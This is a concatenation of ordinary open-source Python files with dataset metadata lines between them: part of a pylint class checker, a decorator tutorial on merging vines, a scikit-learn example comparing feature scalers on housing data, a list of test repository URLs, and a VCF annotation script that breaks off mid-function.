if klass is None:
self.add_message('protected-access', node=node, args=attrname)
return
# If the expression begins with a call to super, that's ok.
if isinstance(node.expr, astroid.CallFunc) and \
isinstance(node.expr.func, astroid.Name) and \
node.expr.func.name == 'super':
return
            # We are in a class; one remaining valid case: Klass._attr inside
# Klass
if not (callee == klass.name or callee in klass.basenames):
# Detect property assignments in the body of the class.
# This is acceptable:
#
# class A:
# b = property(lambda: self._b)
stmt = node.parent.statement()
try:
if (isinstance(stmt, astroid.Assign) and
(stmt in klass.body or klass.parent_of(stmt)) and
isinstance(stmt.value, astroid.CallFunc) and
isinstance(stmt.value.func, astroid.Name) and
stmt.value.func.name == 'property' and
is_builtin_object(next(stmt.value.func.infer(), None))):
return
except astroid.InferenceError:
pass
self.add_message('protected-access', node=node, args=attrname)
def visit_name(self, node):
"""check if the name handle an access to a class member
if so, register it
"""
if self._first_attrs and (node.name == self._first_attrs[-1] or
not self._first_attrs[-1]):
self._meth_could_be_func = False
def _check_accessed_members(self, node, accessed):
"""check that accessed members are defined"""
# XXX refactor, probably much simpler now that E0201 is in type checker
for attr, nodes in six.iteritems(accessed):
# deactivate "except doesn't do anything", that's expected
# pylint: disable=W0704
try:
# is it a class attribute ?
node.local_attr(attr)
# yes, stop here
continue
except astroid.NotFoundError:
pass
# is it an instance attribute of a parent class ?
try:
next(node.instance_attr_ancestors(attr))
# yes, stop here
continue
except StopIteration:
pass
# is it an instance attribute ?
try:
defstmts = node.instance_attr(attr)
except astroid.NotFoundError:
pass
else:
# filter out augment assignment nodes
defstmts = [stmt for stmt in defstmts if stmt not in nodes]
if not defstmts:
# only augment assignment for this node, no-member should be
# triggered by the typecheck checker
continue
# filter defstmts to only pick the first one when there are
# several assignments in the same scope
scope = defstmts[0].scope()
defstmts = [stmt for i, stmt in enumerate(defstmts)
if i == 0 or stmt.scope() is not scope]
# if there are still more than one, don't attempt to be smarter
# than we can be
if len(defstmts) == 1:
defstmt = defstmts[0]
# check that if the node is accessed in the same method as
# it's defined, it's accessed after the initial assignment
frame = defstmt.frame()
lno = defstmt.fromlineno
for _node in nodes:
if _node.frame() is frame and _node.fromlineno < lno \
and not are_exclusive(_node.statement(), defstmt,
('AttributeError', 'Exception', 'BaseException')):
self.add_message('access-member-before-definition',
node=_node, args=(attr, lno))
def _check_first_arg_for_type(self, node, metaclass=0):
"""check the name of first argument, expect:
* 'self' for a regular method
* 'cls' for a class method or a metaclass regular method (actually
valid-classmethod-first-arg value)
* 'mcs' for a metaclass class method (actually
valid-metaclass-classmethod-first-arg)
* not one of the above for a static method
"""
# don't care about functions with unknown argument (builtins)
if node.args.args is None:
return
first_arg = node.args.args and node.argnames()[0]
self._first_attrs.append(first_arg)
first = self._first_attrs[-1]
# static method
if node.type == 'staticmethod':
if (first_arg == 'self' or
first_arg in self.config.valid_classmethod_first_arg or
first_arg in self.config.valid_metaclass_classmethod_first_arg):
self.add_message('bad-staticmethod-argument', args=first, node=node)
return
self._first_attrs[-1] = None
# class / regular method with no args
elif not node.args.args:
self.add_message('no-method-argument', node=node)
# metaclass
elif metaclass:
# metaclass __new__ or classmethod
if node.type == 'classmethod':
self._check_first_arg_config(
first,
self.config.valid_metaclass_classmethod_first_arg, node,
'bad-mcs-classmethod-argument', node.name)
# metaclass regular method
else:
self._check_first_arg_config(
first,
self.config.valid_classmethod_first_arg, node,
'bad-mcs-method-argument',
node.name)
# regular class
else:
# class method
if node.type == 'classmethod':
self._check_first_arg_config(
first,
self.config.valid_classmethod_first_arg, node,
'bad-classmethod-argument',
node.name)
# regular method without self as argument
elif first != 'self':
self.add_message('no-self-argument', node=node)
def _check_first_arg_config(self, first, config, node, message,
method_name):
if first not in config:
if len(config) == 1:
valid = repr(config[0])
else:
valid = ', '.join(repr(v) for v in config[:-1])
valid = '%s or %r' % (valid, config[-1])
self.add_message(message, args=(method_name, valid), node=node)
def _check_bases_classes(self, node):
"""check that the given class node implements abstract methods from
base classes
"""
def is_abstract(method):
return method.is_abstract(pass_is_abstract=False)
# check if this class abstract
if class_is_abstract(node):
return
methods = sorted(
unimplemented_abstract_methods(node, is_abstract).items(),
key=lambda item: item[0],
)
for name, method in methods:
owner = method.parent.frame()
if owner is node:
continue
# owner is not this class, it must be a parent class
# check that the ancestor's method is not abstract
if name in node.locals:
# it is redefined as an attribute or with a descriptor
continue
self.add_message('abstract-method', node=node,
args=(name, owner.name))
def _check_interfaces(self, node):
"""check that the given class node really implements declared
interfaces
"""
e0221_hack = [False]
def iface_handler(obj):
"""filter interface objects, it should be classes"""
if not isinstance(obj, astroid.Class):
e0221_hack[0] = True
self.add_message('interface-is-not-class', node=node,
args=(obj.as_string(),))
return False
return True
ignore_iface_methods = self.config.ignore_iface_methods
try:
for iface in node.interfaces(handler_func=iface_handler):
for imethod in iface.methods():
name = imethod.name
if name.startswith('_') or name in ignore_iface_methods:
# don't check method beginning with an underscore,
# usually belonging to the interface implementation
continue
# get class method astroid
try:
method = node_method(node, name)
except astroid.NotFoundError:
self.add_message('missing-interface-method',
args=(name, iface.name),
node=node)
continue
# ignore inherited methods
if method.parent.frame() is not node:
continue
# check signature
self._check_signature(method, imethod,
'%s interface' % iface.name)
except astroid.InferenceError:
if e0221_hack[0]:
return
implements = Instance(node).getattr('__implements__')[0]
assignment = implements.parent
assert isinstance(assignment, astroid.Assign)
# assignment.expr can be a Name or a Tuple or whatever.
# Use as_string() for the message
# FIXME: in case of multiple interfaces, find which one could not
# be resolved
self.add_message('unresolved-interface', node=implements,
args=(node.name, assignment.value.as_string()))
def _check_init(self, node):
"""check that the __init__ method call super or ancestors'__init__
method
"""
if (not self.linter.is_message_enabled('super-init-not-called') and
not self.linter.is_message_enabled('non-parent-init-called')):
return
klass_node = node.parent.frame()
to_call = _ancestors_to_call(klass_node)
not_called_yet = dict(to_call)
for stmt in node.nodes_of_class(astroid.CallFunc):
expr = stmt.func
if not isinstance(expr, astroid.Getattr) \
or expr.attrname != '__init__':
continue
# skip the test if using super
if isinstance(expr.expr, astroid.CallFunc) and \
isinstance(expr.expr.func, astroid.Name) and \
expr.expr.func.name == 'super':
return
try:
klass = next(expr.expr.infer())
if klass is YES:
continue
# The infered klass can be super(), which was
# assigned to a variable and the `__init__` was called later.
#
# base = super()
# base.__init__(...)
if (isinstance(klass, astroid.Instance) and
isinstance(klass._proxied, astroid.Class) and
is_builtin_object(klass._proxied) and
klass._proxied.name == 'super'):
return
try:
del not_called_yet[klass]
except KeyError:
if klass not in to_call:
self.add_message('non-parent-init-called',
node=expr, args=klass.name)
except astroid.InferenceError:
continue
for klass, method in six.iteritems(not_called_yet):
if klass.name == 'object' or method.parent.name == 'object':
continue
self.add_message('super-init-not-called', args=klass.name, node=node)
def _check_signature(self, method1, refmethod, class_type):
"""check that the signature of the two given methods match
class_type is in 'class', 'interface'
"""
if not (isinstance(method1, astroid.Function)
and isinstance(refmethod, astroid.Function)):
self.add_message('method-check-failed',
args=(method1, refmethod), node=method1)
return
# don't care about functions with unknown argument (builtins)
if method1.args.args is None or refmethod.args.args is None:
return
# if we use *args, **kwargs, skip the below checks
if method1.args.vararg or method1.args.kwarg:
return
if is_attr_private(method1.name):
return
if len(method1.args.args) != len(refmethod.args.args):
self.add_message('arguments-differ',
args=(class_type, method1.name),
node=method1)
elif len(method1.args.defaults) < len(refmethod.args.defaults):
self.add_message('signature-differs',
args=(class_type, method1.name),
node=method1)
def is_first_attr(self, node):
"""Check that attribute lookup name use first attribute variable name
(self for method, cls for classmethod and mcs for metaclass).
"""
return self._first_attrs and isinstance(node.expr, astroid.Name) and \
node.expr.name == self._first_attrs[-1]
def _ancestors_to_call(klass_node, method='__init__'):
"""return a dictionary where keys are the list of base classes providing
the queried method, and so that should/may be called from the method node
"""
to_call = {}
for base_node in klass_node.ancestors(recurs=False):
try:
to_call[base_node] = next(base_node.igetattr(method))
except astroid.InferenceError:
continue
return to_call
def node_method(node, method_name):
"""get astroid for <method_name> on the given class node, ensuring it
is a Function node
"""
for n in node.local_attr(method_name):
if isinstance(n, astroid.Function):
return n
raise astroid.NotFoundError(method_name)
def register(linter):
"""required method to auto register this checker """
linter.register_checker(ClassChecker(linter))
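# Illustrative usage sketch (not from the original module): once this checker is
# registered with pylint, its messages can be exercised programmatically; the
# target module name below is hypothetical.
#
#     from pylint.lint import Run
#     Run(['--disable=all', '--enable=no-self-argument,no-init', 'mymodule.py'])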
|
Shouqun/node-gn
|
tools/depot_tools/third_party/pylint/checkers/classes.py
|
Python
|
mit
| 42,518
|
[
"VisIt"
] |
5e925fe6b6efb45173c63f8025935b19004f7498771d12c0bbd11df58790ce65
|
'''
One summer Felicia was visiting her granny's summer house. There were several old and withered vines growing in the garden that no longer produced grapes.
Felicia found it sad, and decided to decorate the vines with wooden grapes she carved out herself. She also watered them with cola, since cola makes everything better.
When winter came, Felicia left, but the vines were still there, better than ever before. Each year they grew higher and wider, and the pairs of neighboring vines
entangled together, forming a single vine. The wooden grapes were also doing just fine: they remained firmly attached to the vines.
Now that n years have passed, Felicia is going to visit her granny again, and she is curious about how the vines are doing. Given the number of grapes she hung on the vines,
return the number of grapes on each vine after n years, assuming that each year the (2 * i - 1)th and the (2 * i)th vines (1-based) merged into a single vine
(for each integer i in range [1, <number_of_vines> / 2]).
Example
For vines = [1, 2, 3, 4, 5] and n = 2, the output should be
mergingVines(vines, n) = [10, 5].
After the first year, two pairs of vines entangled: vines 1 and 2, and vines 3 and 4 (1-based). The last vine didn't have anything to entangle with.
The vines could thus be represented as [3, 7, 5].
After the second year, another pair of vines entangled. The first and the second vines entangled, forming a single vine. It's possible to represent the vines as [10, 5],
which is the answer.
'''
# This one is very complicated and taught me some stuff about decorators that I'm still processing.
# (I'm sure there's more straightforward solutions, but this particular exercise taught me a lot about decorators specifically.)
# Basically, we use a decorator when we want to modify a function "from the outside". By that,
# I mean we don't actually want to change the code of the function itself, in case it's used elsewhere in the way originally intended.
# To do this modification, we write a new function that takes a function as input and outputs a slightly different function. We then use
# a !!!!!decorator!!!!! (yay!!) above the original function that tells Python that the function is slightly modified here.
# This problem goes a little step further and includes an argument that affects how the function will be modified. You'll see.
from functools import reduce
def mergingVines(vines, n):
# We will use this function to modify the sumOnce function further down.
# nTimes is itself a function object. When we use it as a decorator, an
# input of sumOnce (another function object) will be passed into it.
def nTimes(func):
# We want to return a function, so we define a wrapper function that modifies
# the behavior of func to what we want. Here, we want func to compose with itself n times.
def wrapper(*args,**kwargs):
# if the function has been applied 0 times, its effect is that of the identity function
if n == 0:
return (lambda x: x)(*args,**kwargs)
else:
return reduce(lambda f,g: lambda x: f(g(x)) , [ func for _ in range(n) ])(*args,**kwargs)
# we return this wrapper function object, so when nTimes decorates sumOnce,
# the sumOnce function will be passed as an argument to nTimes. Note that we could have
# just passed the vines variable into wrapper, but in general, decorators might decorate functions
# with different numbers or kinds of inputs, so we can use *args (lists of arguments) and
# **kwargs (keyword arguments) to be more general.
return wrapper
# Here's the decorator! We are modifying the sumOnce function
@nTimes
def sumOnce(vines):
res = [vines[i] + vines[i + 1] for i in range(0, len(vines) - 1, 2)]
if len(vines) % 2 == 1:
res.append(vines[-1])
return res
# The decorator has modified sumOnce, so now when we call it, it will actually be applied n times, as
# specified by the decorator function.
return sumOnce(vines)
print(mergingVines([1,2,3,4,5],2))
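# A more conventional (hypothetical) alternative: a decorator *factory* that takes
# n explicitly, so the repeat count is not captured from an enclosing scope.
from functools import wraps

def nTimesFactory(n):
    def decorate(func):
        @wraps(func)
        def wrapper(x):
            # apply func to its own output n times
            for _ in range(n):
                x = func(x)
            return x
        return wrapper
    return decorate

def mergingVines2(vines, n):
    @nTimesFactory(n)
    def sumOnce(vines):
        res = [vines[i] + vines[i + 1] for i in range(0, len(vines) - 1, 2)]
        if len(vines) % 2 == 1:
            res.append(vines[-1])
        return res
    return sumOnce(vines)

print(mergingVines2([1, 2, 3, 4, 5], 2))  # expected: [10, 5]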
|
chuckinator0/Projects
|
scripts/vines.py
|
Python
|
gpl-3.0
| 3,983
|
[
"VisIt"
] |
83ddb29bb580c39b85110ba27b2d39e4ba0c00ff394d076125465f611335113b
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
=============================================================
Compare the effect of different scalers on data with outliers
=============================================================
Feature 0 (median income in a block) and feature 5 (number of households) of
the :ref:`california_housing_dataset` have very
different scales and contain some very large outliers. These two
characteristics lead to difficulties in visualizing the data and, more
importantly, they can degrade the predictive performance of many machine
learning algorithms. Unscaled data can also slow down or even prevent the
convergence of many gradient-based estimators.
Indeed many estimators are designed with the assumption that each feature takes
values close to zero or more importantly that all features vary on comparable
scales. In particular, metric-based and gradient-based estimators often assume
approximately standardized data (centered features with unit variances). A
notable exception is decision tree-based estimators, which are robust to
arbitrary scaling of the data.
This example uses different scalers, transformers, and normalizers to bring the
data within a pre-defined range.
Scalers are linear (or more precisely affine) transformers and differ from each
other in the way they estimate the parameters used to shift and scale each
feature.
:class:`~sklearn.preprocessing.QuantileTransformer` provides non-linear
transformations in which distances
between marginal outliers and inliers are shrunk.
:class:`~sklearn.preprocessing.PowerTransformer` provides
non-linear transformations in which data is mapped to a normal distribution to
stabilize variance and minimize skewness.
Unlike the previous transformations, normalization refers to a per sample
transformation instead of a per feature transformation.
The following code is a bit verbose, feel free to jump directly to the analysis
of the results_.
"""
# Author: Raghav RV <rvraghav93@gmail.com>
# Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Thomas Unterthiner
# License: BSD 3 clause
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib import cm
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import minmax_scale
from sklearn.preprocessing import MaxAbsScaler
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import QuantileTransformer
from sklearn.preprocessing import PowerTransformer
from sklearn.datasets import fetch_california_housing
print(__doc__)
dataset = fetch_california_housing()
X_full, y_full = dataset.data, dataset.target
# Take only 2 features to make visualization easier
# Feature of 0 has a long tail distribution.
# Feature 5 has a few but very large outliers.
X = X_full[:, [0, 5]]
distributions = [
('Unscaled data', X),
('Data after standard scaling',
StandardScaler().fit_transform(X)),
('Data after min-max scaling',
MinMaxScaler().fit_transform(X)),
('Data after max-abs scaling',
MaxAbsScaler().fit_transform(X)),
('Data after robust scaling',
RobustScaler(quantile_range=(25, 75)).fit_transform(X)),
('Data after power transformation (Yeo-Johnson)',
PowerTransformer(method='yeo-johnson').fit_transform(X)),
('Data after power transformation (Box-Cox)',
PowerTransformer(method='box-cox').fit_transform(X)),
('Data after quantile transformation (uniform pdf)',
QuantileTransformer(output_distribution='uniform')
.fit_transform(X)),
('Data after quantile transformation (gaussian pdf)',
QuantileTransformer(output_distribution='normal')
.fit_transform(X)),
('Data after sample-wise L2 normalizing',
Normalizer().fit_transform(X)),
]
# scale the output between 0 and 1 for the colorbar
y = minmax_scale(y_full)
# plasma does not exist in matplotlib < 1.5
cmap = getattr(cm, 'plasma_r', cm.hot_r)
def create_axes(title, figsize=(16, 6)):
fig = plt.figure(figsize=figsize)
fig.suptitle(title)
# define the axis for the first plot
left, width = 0.1, 0.22
bottom, height = 0.1, 0.7
bottom_h = height + 0.15
left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.1]
rect_histy = [left_h, bottom, 0.05, height]
ax_scatter = plt.axes(rect_scatter)
ax_histx = plt.axes(rect_histx)
ax_histy = plt.axes(rect_histy)
# define the axis for the zoomed-in plot
left = width + left + 0.2
left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.1]
rect_histy = [left_h, bottom, 0.05, height]
ax_scatter_zoom = plt.axes(rect_scatter)
ax_histx_zoom = plt.axes(rect_histx)
ax_histy_zoom = plt.axes(rect_histy)
# define the axis for the colorbar
left, width = width + left + 0.13, 0.01
rect_colorbar = [left, bottom, width, height]
ax_colorbar = plt.axes(rect_colorbar)
return ((ax_scatter, ax_histy, ax_histx),
(ax_scatter_zoom, ax_histy_zoom, ax_histx_zoom),
ax_colorbar)
def plot_distribution(axes, X, y, hist_nbins=50, title="",
x0_label="", x1_label=""):
ax, hist_X1, hist_X0 = axes
ax.set_title(title)
ax.set_xlabel(x0_label)
ax.set_ylabel(x1_label)
# The scatter plot
colors = cmap(y)
ax.scatter(X[:, 0], X[:, 1], alpha=0.5, marker='o', s=5, lw=0, c=colors)
# Removing the top and the right spine for aesthetics
# make nice axis layout
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.spines['left'].set_position(('outward', 10))
ax.spines['bottom'].set_position(('outward', 10))
# Histogram for axis X1 (feature 5)
hist_X1.set_ylim(ax.get_ylim())
hist_X1.hist(X[:, 1], bins=hist_nbins, orientation='horizontal',
color='grey', ec='grey')
hist_X1.axis('off')
# Histogram for axis X0 (feature 0)
hist_X0.set_xlim(ax.get_xlim())
hist_X0.hist(X[:, 0], bins=hist_nbins, orientation='vertical',
color='grey', ec='grey')
hist_X0.axis('off')
# %%
# Two plots will be shown for each scaler/normalizer/transformer. The left
# figure will show a scatter plot of the full data set while the right figure
# will exclude the extreme values considering only 99 % of the data set,
# excluding marginal outliers. In addition, the marginal distributions for each
# feature will be shown on the sides of the scatter plot.
def make_plot(item_idx):
title, X = distributions[item_idx]
ax_zoom_out, ax_zoom_in, ax_colorbar = create_axes(title)
axarr = (ax_zoom_out, ax_zoom_in)
plot_distribution(axarr[0], X, y, hist_nbins=200,
x0_label="Median Income",
x1_label="Number of households",
title="Full data")
# zoom-in
zoom_in_percentile_range = (0, 99)
cutoffs_X0 = np.percentile(X[:, 0], zoom_in_percentile_range)
cutoffs_X1 = np.percentile(X[:, 1], zoom_in_percentile_range)
non_outliers_mask = (
np.all(X > [cutoffs_X0[0], cutoffs_X1[0]], axis=1) &
np.all(X < [cutoffs_X0[1], cutoffs_X1[1]], axis=1))
plot_distribution(axarr[1], X[non_outliers_mask], y[non_outliers_mask],
hist_nbins=50,
x0_label="Median Income",
x1_label="Number of households",
title="Zoom-in")
norm = mpl.colors.Normalize(y_full.min(), y_full.max())
mpl.colorbar.ColorbarBase(ax_colorbar, cmap=cmap,
norm=norm, orientation='vertical',
label='Color mapping for values of y')
# %%
# .. _results:
#
# Original data
# -------------
#
# Each transformation is plotted showing two transformed features, with the
# left plot showing the entire dataset, and the right zoomed-in to show the
# dataset without the marginal outliers. A large majority of the samples are
# compacted to a specific range, [0, 10] for the median income and [0, 6] for
# the number of households. Note that there are some marginal outliers (some
# blocks have more than 1200 households). Therefore, a specific pre-processing
# can be very beneficial depending on the application. In the following, we
# present some insights and behaviors of those pre-processing methods in the
# presence of marginal outliers.
make_plot(0)
# %%
# StandardScaler
# --------------
#
# :class:`~sklearn.preprocessing.StandardScaler` removes the mean and scales
# the data to unit variance. The scaling shrinks the range of the feature
# values as shown in the left figure below.
# However, the outliers have an influence when computing the empirical mean and
# standard deviation. Note in particular that because the outliers on each
# feature have different magnitudes, the spread of the transformed data on
# each feature is very different: most of the data lie in the [-2, 4] range for
# the transformed median income feature while the same data is squeezed in the
# smaller [-0.2, 0.2] range for the transformed number of households.
#
# :class:`~sklearn.preprocessing.StandardScaler` therefore cannot guarantee
# balanced feature scales in the
# presence of outliers.
make_plot(1)
# %%
# MinMaxScaler
# ------------
#
# :class:`~sklearn.preprocessing.MinMaxScaler` rescales the data set such that
# all feature values are in
# the range [0, 1] as shown in the right panel below. However, this scaling
# compresses all inliers into the narrow range [0, 0.005] for the transformed
# number of households.
#
# Both :class:`~sklearn.preprocessing.StandardScaler` and
# :class:`~sklearn.preprocessing.MinMaxScaler` are very sensitive to the
# presence of outliers.
make_plot(2)
# %%
# MaxAbsScaler
# ------------
#
# :class:`~sklearn.preprocessing.MaxAbsScaler` is similar to
# :class:`~sklearn.preprocessing.MinMaxScaler` except that the absolute
# values are mapped in the range [0, 1]. On positive-only data, both scalers
# behave similarly.
# :class:`~sklearn.preprocessing.MaxAbsScaler` therefore also suffers from
# the presence of large outliers.
make_plot(3)
# %%
# RobustScaler
# ------------
#
# Unlike the previous scalers, the centering and scaling statistics of
# :class:`~sklearn.preprocessing.RobustScaler`
# are based on percentiles and are therefore not influenced by a small
# number of very large marginal outliers. Consequently, the resulting range of
# the transformed feature values is larger than for the previous scalers and,
# more importantly, approximately the same for both features: most of the
# transformed values lie in a [-2, 3] range as seen in the zoomed-in figure.
# Note that the outliers themselves are still present in the transformed data.
# If a separate outlier clipping is desirable, a non-linear transformation is
# required (see below).
make_plot(4)
# %%
# PowerTransformer
# ----------------
#
# :class:`~sklearn.preprocessing.PowerTransformer` applies a power
# transformation to each feature to make the data more Gaussian-like in order
# to stabilize variance and minimize skewness. Currently the Yeo-Johnson
# and Box-Cox transforms are supported and the optimal
# scaling factor is determined via maximum likelihood estimation in both
# methods. By default, :class:`~sklearn.preprocessing.PowerTransformer` applies
# zero-mean, unit variance normalization. Note that
# Box-Cox can only be applied to strictly positive data. Income and number of
# households happen to be strictly positive, but if negative values are present
# the Yeo-Johnson transform is preferred.
make_plot(5)
make_plot(6)
# %%
# QuantileTransformer (uniform output)
# ------------------------------------
#
# :class:`~sklearn.preprocessing.QuantileTransformer` applies a non-linear
# transformation such that the
# probability density function of each feature will be mapped to a uniform
# or Gaussian distribution. In this case, all the data, including outliers,
# will be mapped to a uniform distribution with the range [0, 1], making
# outliers indistinguishable from inliers.
#
# :class:`~sklearn.preprocessing.RobustScaler` and
# :class:`~sklearn.preprocessing.QuantileTransformer` are robust to outliers in
# the sense that adding or removing outliers in the training set will yield
# approximately the same transformation. But contrary to
# :class:`~sklearn.preprocessing.RobustScaler`,
# :class:`~sklearn.preprocessing.QuantileTransformer` will also automatically
# collapse outliers by setting them to the a priori defined range boundaries
# (0 and 1). This can result in saturation artifacts for extreme values.
make_plot(7)
# %%
# QuantileTransformer (Gaussian output)
# -------------------------------------
#
# To map to a Gaussian distribution, set the parameter
# ``output_distribution='normal'``.
make_plot(8)
# %%
# Normalizer
# ----------
#
# The :class:`~sklearn.preprocessing.Normalizer` rescales the vector for each
# sample to have unit norm,
# independently of the distribution of the samples. It can be seen on both
# figures below where all samples are mapped onto the unit circle. In our
# example the two selected features have only positive values; therefore the
# transformed data only lie in the positive quadrant. This would not be the
# case if some original features had a mix of positive and negative values.
make_plot(9)
plt.show()
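# %%
# A minimal follow-up sketch (not part of the original example): in practice a
# scaler is usually chained with an estimator in a pipeline, so that the
# scaling statistics are learned from the training data only.
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import Ridge

pipe = make_pipeline(RobustScaler(quantile_range=(25, 75)), Ridge())
pipe.fit(X_full, y_full)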
|
glemaitre/scikit-learn
|
examples/preprocessing/plot_all_scaling.py
|
Python
|
bsd-3-clause
| 13,721
|
[
"Gaussian"
] |
ade3c8dfc63f2ffaa974036ef80a82d8d900574fc44b590a6d616615096c6e70
|
"""Only External Repos url specific constants module"""
CUSTOM_FILE_REPO = 'https://fixtures.pulpproject.org/file/'
CUSTOM_KICKSTART_REPO = 'http://ftp.cvut.cz/centos/8/BaseOS/x86_64/kickstart/'
CUSTOM_RPM_REPO = 'https://fixtures.pulpproject.org/rpm-signed/'
CUSTOM_RPM_SHA_512 = 'https://fixtures.pulpproject.org/rpm-with-sha-512/'
FAKE_5_YUM_REPO = 'https://rplevka.fedorapeople.org/fakerepo01/'
FAKE_YUM_DRPM_REPO = 'https://fixtures.pulpproject.org/drpm-signed/'
FAKE_YUM_SRPM_REPO = 'https://fixtures.pulpproject.org/srpm-signed/'
FAKE_YUM_SRPM_DUPLICATE_REPO = 'https://fixtures.pulpproject.org/srpm-duplicate/'
FAKE_YUM_MD5_REPO = 'https://fixtures.pulpproject.org/rpm-with-md5/'
# Fedora's OSTree repo changed to a single repo at
# https://kojipkgs.fedoraproject.org/compose/ostree/repo/
# With branches for each version. Some tests (test_positive_update_url) still need 2 repos URLs,
# We will use the archived versions for now, but probably need to revisit this.
FEDORA26_OSTREE_REPO = 'https://kojipkgs.fedoraproject.org/compose/ostree-20190207-old/26/'
FEDORA27_OSTREE_REPO = 'https://kojipkgs.fedoraproject.org/compose/ostree-20190207-old/26/'
OSTREE_REPO = 'https://fixtures.pulpproject.org/ostree/small/'
FAKE_0_YUM_REPO_STRING_BASED_VERSIONS = (
'https://fixtures.pulpproject.org/rpm-string-version-updateinfo/'
)
ANSIBLE_GALAXY = 'https://galaxy.ansible.com/'
ANSIBLE_HUB = 'https://cloud.redhat.com/api/automation-hub/'
|
SatelliteQE/robottelo
|
robottelo/constants/repos.py
|
Python
|
gpl-3.0
| 1,448
|
[
"Galaxy"
] |
756aedeb5cbe79fb858e2737f0911f4b2597eee2328a4b53939c1d1de843a6ea
|
#!/usr/bin/env python
import sys
import argparse
import multiprocessing
import logging
import vcf
import random
import math
import pysam
def annotate_vcfs(bam, chromosomes, vcfs):
func_logger = logging.getLogger("%s-%s" % (annotate_vcfs.__name__, multiprocessing.current_process()))
random.seed(0)
# Load indexed BAM file
sam_file = pysam.Samfile(bam.name, "rb")
if not chromosomes:
func_logger.info("Chromosome list unspecified. Inferring from the BAMs")
chromosomes += list(sam_file.references)
chromosomes = sorted(list(set(chromosomes)))
func_logger.info("Chromosome list inferred as %s" % (str(chromosomes)))
if not chromosomes or len(chromosomes) == 0:
func_logger.error("Chromosome list empty")
return None
# Read through samfile and get some statistics
# hard code this for now
read_limit = 1000
# this is temporary, needs to read the reference to be sensible
# TODODODODODO!!!
num_read = 0.0
cover_sum = 0.0
template_list = list()
first_chr = sam_file.getrname(0)
for i in xrange(0, read_limit):
loc = random.randint(0, 30000000)
alignments = sam_file.fetch(first_chr, loc, loc + 1)
curr_num = 0
for aln in alignments:
if aln.mapq < 18:
continue
curr_num += 1
cover_sum += 1
template_list.append(abs(aln.tlen))
if curr_num > 0:
num_read += 1
template_list.sort()
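    # Estimate insert-size mean/sd from the central 90% of template lengths
    # (5th-95th percentile) so extreme outliers don't skew the estimates.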
num_template = float(len(template_list))
low_bound = int(math.floor(num_template * 0.05))
upp_bound = int(math.ceil(num_template * 0.95))
insert_count = 0
insert_sum = 0.0
insert_sq_sum = 0.0
for i in xrange(low_bound, upp_bound):
insert_count += 1
insert_sum += template_list[i]
insert_sq_sum += template_list[i] * template_list[i]
mean_coverage = cover_sum / num_read
mean_insert_size = insert_sum / insert_count
sd_insert_size = math.sqrt((insert_sq_sum / insert_count) - (mean_insert_size * mean_insert_size))
func_logger.info("Estimated coverage mean: {0:.2f}".format(mean_coverage))
func_logger.info("Estimated template size mean: {0:.2f}".format(mean_insert_size))
func_logger.info("Estimated template size sd: {0:.2f}".format(sd_insert_size))
func_logger.info("Estimated template size Q5: {0:.2f}".format(template_list[low_bound]))
func_logger.info("Estimated template size Q95: {0:.2f}".format(template_list[upp_bound - 1]))
template_upper_bound = mean_insert_size + (3 * sd_insert_size)
template_lower_bound = mean_insert_size - (3 * sd_insert_size)
# Read though VCF one line at a time
for inVCF in vcfs:
vcf_reader = vcf.Reader(open(inVCF.name))
vcf_template_reader = vcf.Reader(open(inVCF.name))
vcf_writer = vcf.Writer(open("anno_" + inVCF.name, 'w'), vcf_template_reader)
num_processed = 0
for vcf_record in vcf_reader:
if vcf_record.CHROM not in chromosomes:
continue
num_processed += 1
if num_processed % 100 == 0:
func_logger.info("{0} read from {1}".format(num_processed, inVCF.name))
# get the interval that corresponds to the SV
if vcf_record.INFO['SVTYPE'] == 'INS':
breakpoints = (vcf_record.start, vcf_record.start + 1)
else:
if 'END' in vcf_record.INFO:
breakpoints = (vcf_record.start, vcf_record.INFO['END'])
else:
breakpoints = (vcf_record.start, vcf_record.start + abs(int(vcf_record.INFO['SVLEN'][0])))
process_variant = True
if breakpoints[1] - breakpoints[0] > 1000000:
process_variant = False
if process_variant:
# get reads between breakpoints
# sample with replacement 100 points
unique_coverage = 0.0
total_coverage = 0.0
num_forward = 0.0
bases_aligned = 0.0
total_bases = 0.0
end_bases_aligned = 0.0
end_total_bases = 0.0
num_discordant_high = 0.0
num_discordant_low = 0.0
num_repeat = 10
for i in xrange(0, num_repeat):
loc = random.randint(breakpoints[0], breakpoints[1])
alignments = sam_file.fetch(vcf_record.CHROM, loc, loc + 1)
for rec in alignments:
if rec.mapq >= 18:
unique_coverage += 1
if not rec.is_reverse:
num_forward += 1
total_bases += rec.rlen
bases_aligned += rec.qlen
total_coverage += 1
# compute number of discordant
                for loc in [int(max(breakpoints[0] - sd_insert_size, 0)),
                            int(breakpoints[1] + sd_insert_size)]:  # fetch() expects integer coordinates
alignments = sam_file.fetch(vcf_record.CHROM, loc, loc + 1)
for rec in alignments:
if rec.mapq >= 18:
if abs(rec.tlen) > template_upper_bound:
num_discordant_high += 1
if abs(rec.tlen) < template_lower_bound:
num_discordant_low += 1
end_total_bases += rec.rlen
end_bases_aligned += rec.qlen
# get coverage between the breakpoints
vcf_record.INFO["AA_UNIQ_COV"] = (unique_coverage / num_repeat) / mean_coverage
vcf_record.INFO["AA_TOTAL_COV"] = (total_coverage / num_repeat) / mean_coverage
# get strand bias
if unique_coverage > 0.0:
vcf_record.INFO["AA_TOTAL_STRAND"] = (num_forward / unique_coverage - 0.5) ** 2
# get mapping quality stats
if total_coverage > 0.0:
vcf_record.INFO["AA_PROP_REPEAT"] = unique_coverage / total_coverage
# get clipped reads stats
if total_bases > 0.0:
vcf_record.INFO["AA_PROP_ALIGNED"] = bases_aligned / total_bases
if end_total_bases > 0.0:
vcf_record.INFO["AA_END_PROP_ALIGNED"] = end_bases_aligned / end_total_bases
# get discordant reads stats
vcf_record.INFO["AA_DISCORDANT_HIGH"] = num_discordant_high
